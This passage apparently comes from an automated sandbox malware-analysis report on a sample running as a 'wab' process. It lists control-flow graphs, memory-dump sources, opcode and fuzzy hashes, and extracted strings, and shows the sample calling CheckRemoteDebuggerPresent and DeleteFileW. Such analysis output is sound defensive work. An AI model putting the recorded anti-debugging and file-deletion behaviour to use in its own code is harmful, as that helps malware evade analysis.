1292 232cb1e6-232cb1e9 1288->1292 1293 232cb1e1 1288->1293 1292->1197 1295 232cb1ef-232cb200 1292->1295 1293->1292 1307 232cb484-232cb48e 1301->1307 1306 232cb318-232cb321 1302->1306 1302->1307 1306->1301 1309 232cb327-232cb32f 1306->1309 1310 232cb335-232cb34e 1309->1310 1311 232cb466-232cb472 1309->1311 1320 232cb45c-232cb461 1310->1320 1321 232cb354-232cb37b 1310->1321 1311->1306 1312 232cb478 1311->1312 1312->1307 1323 232cae9d-232caf6b 1317->1323 1324 232cae87-232cae8d 1317->1324 1330 232caf9f-232cafa0 1318->1330 1331 232caf97 1318->1331 1320->1311 1321->1320 1334 232cb381-232cb3a9 1321->1334 1323->1317 1323->1318 1328 232cae8f 1324->1328 1329 232cae91-232cae93 1324->1329 1328->1323 1329->1323 1330->1183 1331->1330 1334->1320 1341 232cb3af-232cb3c9 1334->1341 1341->1320 1344 232cb3cf-232cb3eb 1341->1344 1344->1320 1350 232cb3ed-232cb40c 1344->1350 1350->1320 1355 232cb40e-232cb45a 1350->1355 1355->1311
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PH7q
                                  • API String ID: 0-600173912
                                  • Opcode ID: 0a0b3aed6dd9dd5fb31e54c93e71a4ebef49ac781ff9750416d5901cf4249aab
                                  • Instruction ID: 26160791286d8574575fc4221324009be82c1959a1d320cad99c1536b941bee2
                                  • Opcode Fuzzy Hash: 0a0b3aed6dd9dd5fb31e54c93e71a4ebef49ac781ff9750416d5901cf4249aab
                                  • Instruction Fuzzy Hash: 7222E334B001468FCB04DB68C994A9DB7F6FF89310F2589A9E406EB352DB35ED85CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1377 22c95380-22c95404 CheckRemoteDebuggerPresent 1379 22c9540d-22c95448 1377->1379 1380 22c95406-22c9540c 1377->1380 1380->1379
                                  APIs
                                  • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 22C953F7
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882857692180.0000000022C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 22C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_22c90000_wab.jbxd
                                  Similarity
                                  • API ID: CheckDebuggerPresentRemote
                                  • String ID:
                                  • API String ID: 3662101638-0
                                  • Opcode ID: c2ce5fecfdc50e82447bc8f65a083d76ae66f744f7d0356492f7f7a8cbdfa934
                                  • Instruction ID: e2c0f385cfd8e299589e2ec3a36999bb3a165b588af12044855453348428b98a
                                  • Opcode Fuzzy Hash: c2ce5fecfdc50e82447bc8f65a083d76ae66f744f7d0356492f7f7a8cbdfa934
                                  • Instruction Fuzzy Hash: 8A2125B19012598FCB00CFAAD984BEEBBF4AF49320F14845AE459A7750D778A944CFA1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cac9fd9c1eb8e50685075047b77aa09bad9e999e84505860de998fc80db50620
                                  • Instruction ID: eed57d0feb765bdd3e2952565282416d23439ef0642a0eb28f117b1152264b4e
                                  • Opcode Fuzzy Hash: cac9fd9c1eb8e50685075047b77aa09bad9e999e84505860de998fc80db50620
                                  • Instruction Fuzzy Hash: 2632C434B002498FDB04DF68C994B9DB7B6FB88314F158969E406EB385DB35ED82CB91
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1fceafee381f81e281824027acf1d59a2c1712eafc0408084feed75912f4da10
                                  • Instruction ID: e35746f4f7504d4b59a2ece197d7418e155cc39dc3055d0249918d922a84bdbe
                                  • Opcode Fuzzy Hash: 1fceafee381f81e281824027acf1d59a2c1712eafc0408084feed75912f4da10
                                  • Instruction Fuzzy Hash: 8E22A334A0014A8FDB14DB5CC98479DB7F6FB85310F698AA5E409EB396CA34DDC1CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 128 232c1748-232c176c 129 232c176e-232c1771 128->129 130 232c1777-232c186f 129->130 131 232c1e50-232c1e53 129->131 151 232c1875-232c18c2 call 232c1ff9 130->151 152 232c18f2-232c18f9 130->152 132 232c1e74-232c1e76 131->132 133 232c1e55-232c1e6f 131->133 134 232c1e7d-232c1e80 132->134 135 232c1e78 132->135 133->132 134->129 138 232c1e86-232c1e93 134->138 135->134 165 232c18c8-232c18e4 151->165 153 232c197d-232c1986 152->153 154 232c18ff-232c196f 152->154 153->138 171 232c197a 154->171 172 232c1971 154->172 168 232c18ef-232c18f0 165->168 169 232c18e6 165->169 168->152 169->168 171->153 172->171
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: f<q$<8*#$<8*#$XP<q$\O<q
                                  • API String ID: 0-3744418349
                                  • Opcode ID: 8cf46b7d61ef675b4b6c52bd60696754e94b46f3cc0b120d13eb2f3b7e5c1192
                                  • Instruction ID: 5fb5d532e5da993772b6817f3a4c407a27ac13d96f0bf5e04fbff15a01f9799b
                                  • Opcode Fuzzy Hash: 8cf46b7d61ef675b4b6c52bd60696754e94b46f3cc0b120d13eb2f3b7e5c1192
                                  • Instruction Fuzzy Hash: 66619234F002199FEB04ABA4C95579EBBF6FF88700F20856AD506EB394DB759C458F90

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 175 232c98c8-232c98e3 176 232c98e5-232c98e8 175->176 177 232c98ea-232c992c 176->177 178 232c9931-232c9934 176->178 177->178 179 232c997d-232c9980 178->179 180 232c9936-232c9978 178->180 182 232c99c9-232c99cc 179->182 183 232c9982-232c99c4 179->183 180->179 185 232c99ce-232c9a10 182->185 186 232c9a15-232c9a18 182->186 183->182 185->186 188 232c9a1a-232c9a30 186->188 189 232c9a35-232c9a38 186->189 188->189 192 232c9a3a-232c9a7c 189->192 193 232c9a81-232c9a84 189->193 192->193 197 232c9a86-232c9aa2 193->197 198 232c9aa7-232c9aaa 193->198 197->198 201 232c9aac-232c9aae 198->201 202 232c9ab9-232c9abc 198->202 205 232c9ab4 201->205 206 232c9db2 201->206 207 232c9abe-232c9b00 202->207 208 232c9b05-232c9b08 202->208 205->202 215 232c9db5-232c9dc1 206->215 207->208 217 232c9b0a-232c9b4c 208->217 218 232c9b51-232c9b54 208->218 222 232c9c16-232c9c25 215->222 223 232c9dc7-232ca0b4 215->223 217->218 218->215 224 232c9b5a-232c9b5d 218->224 229 232c9c34-232c9c40 222->229 230 232c9c27-232c9c2c 222->230 385 232ca2dc-232ca2e6 223->385 386 232ca0ba-232ca0c0 223->386 231 232c9b6c-232c9b6f 224->231 232 232c9b5f-232c9b61 224->232 235 232c9c46-232c9c58 229->235 236 232ca2e7-232ca31e 229->236 230->229 241 232c9bb8-232c9bbb 231->241 242 232c9b71-232c9bb3 231->242 239 232c9c6f-232c9c78 232->239 240 232c9b67 232->240 261 232c9c5d-232c9c5f 235->261 264 232ca320-232ca323 236->264 245 232c9c7a-232c9c7f 239->245 246 232c9c87-232c9c93 239->246 240->231 248 232c9bbd-232c9bcc 241->248 249 232c9c04-232c9c07 241->249 242->241 245->246 251 232c9c99-232c9cad 246->251 252 232c9da5-232c9daa 246->252 257 232c9bce-232c9bd3 248->257 258 232c9bdb-232c9be7 248->258 253 232c9c09-232c9c0e 249->253 254 232c9c11-232c9c14 249->254 251->206 279 232c9cb3-232c9cc5 251->279 252->206 253->254 254->222 254->261 257->258 258->236 265 232c9bed-232c9bff 258->265 271 232c9c66-232c9c69 261->271 272 232c9c61 261->272 266 232ca325 call 232ca449 264->266 267 232ca332-232ca335 264->267 265->249 281 232ca32b-232ca32d 266->281 277 232ca368-232ca36b 267->277 278 232ca337-232ca363 267->278 271->176 271->239 272->271 283 232ca36d-232ca389 277->283 284 232ca38e-232ca390 277->284 278->277 293 232c9ce9-232c9ceb 279->293 294 232c9cc7-232c9ccd 279->294 281->267 283->284 288 232ca397-232ca39a 284->288 289 232ca392 284->289 288->264 295 232ca39c-232ca3ab 288->295 289->288 296 232c9cf5-232c9d01 293->296 297 232c9ccf 294->297 298 232c9cd1-232c9cdd 294->298 304 232ca3ad-232ca411 295->304 305 232ca413-232ca428 295->305 308 232c9d0f 296->308 309 232c9d03-232c9d0d 296->309 303 232c9cdf-232c9ce7 297->303 298->303 303->296 304->305 313 232c9d14-232c9d16 308->313 309->313 313->206 315 232c9d1c-232c9d39 313->315 323 232c9d48-232c9d54 315->323 324 232c9d3b-232c9d40 315->324 323->252 326 232c9d56-232c9da3 323->326 324->323 326->206 387 232ca0cf-232ca0d8 386->387 388 232ca0c2-232ca0c7 386->388 387->236 389 232ca0de-232ca0f1 387->389 388->387 391 232ca2cc-232ca2d6 389->391 392 232ca0f7-232ca0fd 389->392 391->385 391->386 393 232ca10c-232ca115 392->393 394 232ca0ff-232ca104 392->394 393->236 395 232ca11b-232ca13c 393->395 394->393 398 232ca13e-232ca143 395->398 399 232ca14b-232ca154 395->399 398->399 399->236 400 232ca15a-232ca177 399->400 400->391 403 232ca17d-232ca183 400->403 403->236 404 232ca189-232ca1a2 403->404 406 232ca2bf-232ca2c6 404->406 407 232ca1a8-232ca1cf 404->407 406->391 406->403 407->236 410 232ca1d5-232ca1df 407->410 410->236 411 232ca1e5-232ca1fc 410->411 413 232ca1fe-232ca209 411->413 414 232ca20b-232ca226 411->414 413->414 414->406 419 232ca22c-232ca246 414->419 422 232ca248-232ca24d 419->422 423 232ca255-232ca25e 419->423 422->423 423->236 424 232ca264-232ca2b8 423->424 424->406
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $7q$$7q$$7q
                                  • API String ID: 0-2437495121
                                  • Opcode ID: 9f6618390e30afa7e10ff6e2e00e44c2c33b6d1ed3c19fb57bc83d26515ccf11
                                  • Instruction ID: 10854980a2ab67e2f7bbd75adacbd7fda3ceb14e632f4d6767c0dc8f69d2ff28
                                  • Opcode Fuzzy Hash: 9f6618390e30afa7e10ff6e2e00e44c2c33b6d1ed3c19fb57bc83d26515ccf11
                                  • Instruction Fuzzy Hash: 0A62733460024A8FDB15DF68C68495DB7F6FF84308B65CAA9D006AF354DB75ED86CB80

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 232c5aba-232c5b0d 1093 232c5b0f-232c5b17 1090->1093 1094 232c5b25-232c5b3b 1090->1094 1093->1094 1097 232c5b46-232c5b48 1094->1097 1098 232c5b4a-232c5b52 1097->1098 1099 232c5b60-232c5bd1 1097->1099 1098->1099 1109 232c5bfd-232c5c19 1099->1109 1110 232c5bd3-232c5bf6 1099->1110 1115 232c5c1b-232c5c3e 1109->1115 1116 232c5c45-232c5c60 1109->1116 1110->1109 1115->1116 1121 232c5c8b-232c5ca6 1116->1121 1122 232c5c62-232c5c84 1116->1122 1127 232c5ca8-232c5cc4 1121->1127 1128 232c5ccb-232c63f7 1121->1128 1122->1121 1127->1128
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $7q$$7q
                                  • API String ID: 0-1372239016
                                  • Opcode ID: feb3523719910aa087316c6915a74828c82d0893203470fd349818b327013667
                                  • Instruction ID: 6af306fa691f2fdc53bd0bc8099ae1a50e87d23abf288a9941765052a5a46c6c
                                  • Opcode Fuzzy Hash: feb3523719910aa087316c6915a74828c82d0893203470fd349818b327013667
                                  • Instruction Fuzzy Hash: F8516B34B002458FDB54DB75CD94BAEB7F6AB88310F148975C806E7388EA34ED468F51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1133 232c173b-232c176c 1134 232c176e-232c1771 1133->1134 1135 232c1777-232c186f 1134->1135 1136 232c1e50-232c1e53 1134->1136 1156 232c1875-232c18c2 call 232c1ff9 1135->1156 1157 232c18f2-232c18f9 1135->1157 1137 232c1e74-232c1e76 1136->1137 1138 232c1e55-232c1e6f 1136->1138 1139 232c1e7d-232c1e80 1137->1139 1140 232c1e78 1137->1140 1138->1137 1139->1134 1143 232c1e86-232c1e93 1139->1143 1140->1139 1170 232c18c8-232c18e4 1156->1170 1158 232c197d-232c1986 1157->1158 1159 232c18ff-232c196f 1157->1159 1158->1143 1176 232c197a 1159->1176 1177 232c1971 1159->1177 1173 232c18ef-232c18f0 1170->1173 1174 232c18e6 1170->1174 1173->1157 1174->1173 1176->1158 1177->1176
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: <8*#$XP<q
                                  • API String ID: 0-2422523526
                                  • Opcode ID: 3280b216ade0df711d85f3a8e963f9c7fd7256457a00576aed6c3beca6a5ed5a
                                  • Instruction ID: 4762192c938b0e30ffec1c710b4855833d409ca8288bef427121b76f0a509b80
                                  • Opcode Fuzzy Hash: 3280b216ade0df711d85f3a8e963f9c7fd7256457a00576aed6c3beca6a5ed5a
                                  • Instruction Fuzzy Hash: 51418F74F002189FDB459FA4C918B9EBBF7BF88700F20856AE106AB394DB759C41CB90

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1371 22c9537b-22c95404 CheckRemoteDebuggerPresent 1373 22c9540d-22c95448 1371->1373 1374 22c95406-22c9540c 1371->1374 1374->1373
                                  APIs
                                  • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 22C953F7
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882857692180.0000000022C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 22C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_22c90000_wab.jbxd
                                  Similarity
                                  • API ID: CheckDebuggerPresentRemote
                                  • String ID:
                                  • API String ID: 3662101638-0
                                  • Opcode ID: 81f0397a5aed64e59c7c2101d7dbb3e1ea02f8278501ce612f15972ed5f53fd9
                                  • Instruction ID: c5684c7c2c3401d349be4eddf6c879e6c55a479df608ebb52a6d366481e66486
                                  • Opcode Fuzzy Hash: 81f0397a5aed64e59c7c2101d7dbb3e1ea02f8278501ce612f15972ed5f53fd9
                                  • Instruction Fuzzy Hash: B62148B1C002598FCB10CFAAD584BEEBBF4EF49310F14845AD455A7741D778A945CF61

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1383 22c9649b-22c964ea 1385 22c964ec-22c964ef 1383->1385 1386 22c964f2-22c9651d DeleteFileW 1383->1386 1385->1386 1387 22c9651f-22c96525 1386->1387 1388 22c96526-22c9654e 1386->1388 1387->1388
                                  APIs
                                  • DeleteFileW.KERNEL32(00000000), ref: 22C96510
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882857692180.0000000022C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 22C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_22c90000_wab.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 97a3194fc02f486102f7e27a9ec7ff63739aa02c0b5bf926b6dc1c4837c690d5
                                  • Instruction ID: efa646ee29e62226fd304750b7cc9aacf56e66e4feb20913431f5b4baeddc961
                                  • Opcode Fuzzy Hash: 97a3194fc02f486102f7e27a9ec7ff63739aa02c0b5bf926b6dc1c4837c690d5
                                  • Instruction Fuzzy Hash: A7215BB1C006598FCB10CFAAD6447EEFBB0EF48320F108569D854A7640D734A941CFA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1391 22c964a0-22c964ea 1393 22c964ec-22c964ef 1391->1393 1394 22c964f2-22c9651d DeleteFileW 1391->1394 1393->1394 1395 22c9651f-22c96525 1394->1395 1396 22c96526-22c9654e 1394->1396 1395->1396
                                  APIs
                                  • DeleteFileW.KERNEL32(00000000), ref: 22C96510
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882857692180.0000000022C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 22C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_22c90000_wab.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 77b4dfc29b84b649068981ca0fd46ef0030f5775d69aa7dab61c6430b00c33cc
                                  • Instruction ID: 8b4903e7040ef321b9901207c3dc4082750b451ee71904eb41bc726b6644a899
                                  • Opcode Fuzzy Hash: 77b4dfc29b84b649068981ca0fd46ef0030f5775d69aa7dab61c6430b00c33cc
                                  • Instruction Fuzzy Hash: 161138B1C006599BCB10CF9AD6446AEFBB4EF48720F11856AD914A7640D778A940CFA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1399 232c3270-232c328c 1400 232c328e-232c3291 1399->1400 1401 232c32ba-232c32bd 1400->1401 1402 232c3293-232c32ad call 22c9e9cf 1400->1402 1403 232c32bf-232c32db 1401->1403 1404 232c32e0-232c32e2 1401->1404 1417 232c32b2-232c32b5 1402->1417 1403->1404 1406 232c32e9-232c32ec 1404->1406 1407 232c32e4 1404->1407 1406->1400 1409 232c32ee-232c32fa 1406->1409 1407->1406 1411 232c35ad-232c35b0 1409->1411 1412 232c3300-232c3309 1409->1412 1415 232c35d7-232c35e0 1411->1415 1413 232c330f-232c3330 1412->1413 1414 232c35b2-232c35d0 1412->1414 1422 232c333a-232c3374 1413->1422 1423 232c3332-232c3335 1413->1423 1414->1415 1417->1401 1430 232c337e-232c3384 1422->1430 1431 232c3376-232c3379 1422->1431 1423->1415 1432 232c338a-232c33f0 1430->1432 1433 232c359b-232c35a7 1430->1433 1431->1415 1432->1414 1442 232c33f6-232c3400 1432->1442 1433->1411 1433->1412 1442->1414 1443 232c3406-232c341c 1442->1443 1443->1414 1445 232c3422-232c343d 1443->1445 1448 232c344c-232c3453 1445->1448 1449 232c343f-232c3444 1445->1449 1448->1414 1450 232c3459-232c3463 1448->1450 1449->1448 1451 232c3465-232c346a 1450->1451 1452 232c3472-232c3479 1450->1452 1451->1452 1452->1414 1453 232c347f-232c3489 1452->1453 1454 232c3498-232c349f 1453->1454 1455 232c348b-232c3490 1453->1455 1454->1414 1456 232c34a5-232c34b5 1454->1456 1455->1454 1457 232c34c4-232c34cb 1456->1457 1458 232c34b7-232c34bc 1456->1458 1457->1414 1459 232c34d1-232c34db 1457->1459 1458->1457 1460 232c34dd-232c34e2 1459->1460 1461 232c34ea-232c34f1 1459->1461 1460->1461 1461->1414 1462 232c34f7-232c350f 1461->1462 1464 232c3520 1462->1464 1465 232c3511-232c351e 1462->1465 1466 232c3525-232c3527 1464->1466 1465->1466 1467 232c358e-232c3595 1466->1467 1468 232c3529-232c352b 1466->1468 1467->1432 1467->1433 1469 232c352d-232c3537 1468->1469 1470 232c3539 1468->1470 1471 232c353e-232c3540 1469->1471 1470->1471 1471->1467 1472 232c3542-232c3587 1471->1472 1472->1467
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 80*#
                                  • API String ID: 0-4256978840
                                  • Opcode ID: 4c2b0d0cd99fe5d4c64b7d86247af9e8b88b09fbe9939b7789bcfd652726c607
                                  • Instruction ID: 9e4f61b87b984598e1daec56073cd69f487beb305de20176d87f28fbc16ad382
                                  • Opcode Fuzzy Hash: 4c2b0d0cd99fe5d4c64b7d86247af9e8b88b09fbe9939b7789bcfd652726c607
                                  • Instruction Fuzzy Hash: A6A1B230A002458FCB15EB64C648A9DB7F2EF88354F19CDA9D546AB351DB39ED82CF84

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1480 232c119c-232c11d7 1481 232c11d9-232c11dc 1480->1481 1482 232c11de-232c11f3 1481->1482 1483 232c11f8-232c11fb 1481->1483 1482->1483 1484 232c11fd-232c1221 1483->1484 1485 232c1226-232c1229 1483->1485 1484->1485 1487 232c122b-232c1240 1485->1487 1488 232c1245-232c1248 1485->1488 1487->1488 1490 232c125f-232c1262 1488->1490 1491 232c124a-232c125a 1488->1491 1492 232c128f-232c1292 1490->1492 1493 232c1264-232c128a 1490->1493 1491->1490 1496 232c1294-232c12b0 1492->1496 1497 232c12b5-232c12b8 1492->1497 1493->1492 1496->1497 1499 232c13fc-232c13ff 1497->1499 1500 232c12be-232c13f7 1497->1500 1501 232c141c-232c141f 1499->1501 1502 232c1401-232c1407 1499->1502 1500->1499 1505 232c1421-232c143d 1501->1505 1506 232c1442-232c1445 1501->1506 1508 232c1411-232c1417 1502->1508 1505->1506 1509 232c1467-232c146a 1506->1509 1510 232c1447-232c1462 1506->1510 1508->1501 1514 232c146c-232c1482 1509->1514 1515 232c1487-232c148a 1509->1515 1510->1509 1514->1515 1516 232c148c-232c149a 1515->1516 1517 232c149f-232c14a1 1515->1517 1516->1517 1521 232c14a8-232c14ab 1517->1521 1522 232c14a3 1517->1522 1521->1481 1524 232c14b1-232c14ba 1521->1524 1522->1521
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,7*#
                                  • API String ID: 0-663257557
                                  • Opcode ID: a542e04b7f099741e41c70df5acaa84c07c935fdb8f1dad283f17979b759124a
                                  • Instruction ID: 191a0bc44901304e7ca8719b6eb62c13a45d9bb18d6a40f4f9f1319836773b9c
                                  • Opcode Fuzzy Hash: a542e04b7f099741e41c70df5acaa84c07c935fdb8f1dad283f17979b759124a
                                  • Instruction Fuzzy Hash: 59914E34E0025A8BDB10DF68C890B9DB7B1FF99300F208699D449FB295DB71AA86CF51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1531 232cad13-232cad18 1532 232cad1a-232cad41 1531->1532 1533 232cacd1-232cacd3 1531->1533 1536 232cad43-232cad46 1532->1536 1534 232cacd4-232cace3 1533->1534 1540 232cace9-232cacff 1534->1540 1541 232cac16-232cac2a 1534->1541 1538 232cad4c-232cad4f 1536->1538 1539 232cafb3-232cafbc 1536->1539 1542 232cad51-232cad6d 1538->1542 1543 232cad72-232cad75 1538->1543 1544 232cad77-232cad80 1539->1544 1545 232cafc2-232cafcc 1539->1545 1540->1531 1541->1534 1555 232cac30-232cac3f 1541->1555 1542->1543 1543->1544 1546 232cad92-232cad95 1543->1546 1547 232cafcd-232cb003 1544->1547 1548 232cad86-232cad8d 1544->1548 1550 232cad9f-232cada2 1546->1550 1551 232cad97-232cad9c 1546->1551 1559 232cb005-232cb008 1547->1559 1548->1546 1556 232cada4 1550->1556 1557 232cadb2-232cadb4 1550->1557 1551->1550 1555->1534 1568 232cac45-232caccd 1555->1568 1566 232cadaa-232cadad 1556->1566 1560 232cadbb-232cadbe 1557->1560 1561 232cadb6 1557->1561 1563 232cb028-232cb02b 1559->1563 1564 232cb00a-232cb023 1559->1564 1560->1536 1567 232cadc0-232cae74 1560->1567 1561->1560 1569 232cb02d-232cb053 1563->1569 1570 232cb058-232cb05b 1563->1570 1564->1563 1566->1557 1693 232cae7a-232cae85 1567->1693 1694 232caf71-232caf95 1567->1694 1568->1534 1569->1570 1571 232cb05d-232cb063 1570->1571 1572 232cb068-232cb06b 1570->1572 1571->1572 1575 232cb07c-232cb07f 1572->1575 1576 232cb06d-232cb077 1572->1576 1580 232cb08c-232cb08f 1575->1580 1581 232cb081-232cb087 1575->1581 1576->1575 1586 232cb097-232cb09a 1580->1586 1587 232cb091-232cb092 1580->1587 1581->1580 1589 232cb09c-232cb0ae 1586->1589 1590 232cb0b3-232cb0b6 1586->1590 1587->1586 1589->1590 1592 232cb0b8-232cb0bb 1590->1592 1593 232cb0ca-232cb0cd 1590->1593 1597 232cb201-232cb236 1592->1597 1598 232cb0c1-232cb0c5 1592->1598 1599 232cb0cf-232cb0d8 1593->1599 1600 232cb0ea-232cb0ed 1593->1600 1613 232cb238-232cb23b 1597->1613 1598->1593 1599->1597 1602 232cb0de-232cb0e5 1599->1602 1603 232cb0ef-232cb0fe 1600->1603 1604 232cb105-232cb108 1600->1604 1602->1600 1618 232cb16c-232cb16f 1603->1618 1619 232cb100 1603->1619 1607 232cb10a-232cb125 1604->1607 1608 232cb130-232cb133 1604->1608 1607->1587 1635 232cb12b 1607->1635 1610 232cb13a-232cb13d 1608->1610 1611 232cb135-232cb137 1608->1611 1615 232cb13f-232cb162 1610->1615 1616 232cb167-232cb16a 1610->1616 1611->1610 1620 232cb23d-232cb259 1613->1620 1621 232cb25e-232cb261 1613->1621 1615->1616 1616->1618 1622 232cb174-232cb177 1616->1622 1618->1622 1619->1604 1620->1621 1623 232cb26e-232cb271 1621->1623 1624 232cb263-232cb26d 1621->1624 1626 232cb179-232cb17c 1622->1626 1627 232cb187-232cb18a 1622->1627 1629 232cb288-232cb28b 1623->1629 1630 232cb273-232cb281 1623->1630 1626->1592 1634 232cb182 1626->1634 1636 232cb18c-232cb191 1627->1636 1637 232cb194-232cb197 1627->1637 1639 232cb28d-232cb2a6 1629->1639 1640 232cb2ab-232cb2ad 1629->1640 1649 232cb2bd-232cb2ea 1630->1649 1651 232cb283 1630->1651 1634->1627 1635->1608 1636->1637 1644 232cb199-232cb1b5 1637->1644 1645 232cb1ba-232cb1bd 1637->1645 1639->1640 1642 232cb2af 1640->1642 1643 232cb2b4-232cb2b7 1640->1643 1642->1643 1643->1613 1643->1649 1644->1645 1652 232cb1bf-232cb1c2 1645->1652 1653 232cb1c9-232cb1d2 1645->1653 1676 232cb47a-232cb47f 1649->1676 1677 232cb2f0-232cb312 1649->1677 1651->1629 1652->1626 1656 232cb1c4-232cb1c7 1652->1656 1653->1599 1659 232cb1d8 1653->1659 1656->1653 1660 232cb1dd-232cb1df 1656->1660 1659->1660 1665 232cb1e6-232cb1e9 1660->1665 1666 232cb1e1 1660->1666 1665->1559 1668 232cb1ef-232cb200 1665->1668 1666->1665 1683 232cb484-232cb48e 1676->1683 1682 232cb318-232cb321 1677->1682 1677->1683 1682->1676 1685 232cb327-232cb32f 1682->1685 1686 232cb335-232cb34e 1685->1686 1687 232cb466-232cb472 1685->1687 1696 232cb45c-232cb461 1686->1696 1697 232cb354-232cb37b 1686->1697 1687->1682 1688 232cb478 1687->1688 1688->1683 1699 232cae9d-232caf6b 1693->1699 1700 232cae87-232cae8d 1693->1700 1706 232caf9f-232cafa0 1694->1706 1707 232caf97 1694->1707 1696->1687 1697->1696 1710 232cb381-232cb3a9 1697->1710 1699->1693 1699->1694 1704 232cae8f 1700->1704 1705 232cae91-232cae93 1700->1705 1704->1699 1705->1699 1706->1539 1707->1706 1710->1696 1717 232cb3af-232cb3c9 1710->1717 1717->1696 1720 232cb3cf-232cb3eb 1717->1720 1720->1696 1726 232cb3ed-232cb40c 1720->1726 1726->1696 1731 232cb40e-232cb45a 1726->1731 1731->1687
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PH7q
                                  • API String ID: 0-600173912
                                  • Opcode ID: f3276a4a94f6fe26a29b149e5ff4aeb6129fccc5001ee29a42a7b2b95806f902
                                  • Instruction ID: 57b6bdf2d4346582f1d4e0d5873b14b6ed10047b591beda5d4912e1feb8e31d9
                                  • Opcode Fuzzy Hash: f3276a4a94f6fe26a29b149e5ff4aeb6129fccc5001ee29a42a7b2b95806f902
                                  • Instruction Fuzzy Hash: 32818B34B102458FCB45DF28C998A9DBBF2EF89314B1589A9E406DB361DB31EC41CB91

                                  Control-flow Graph

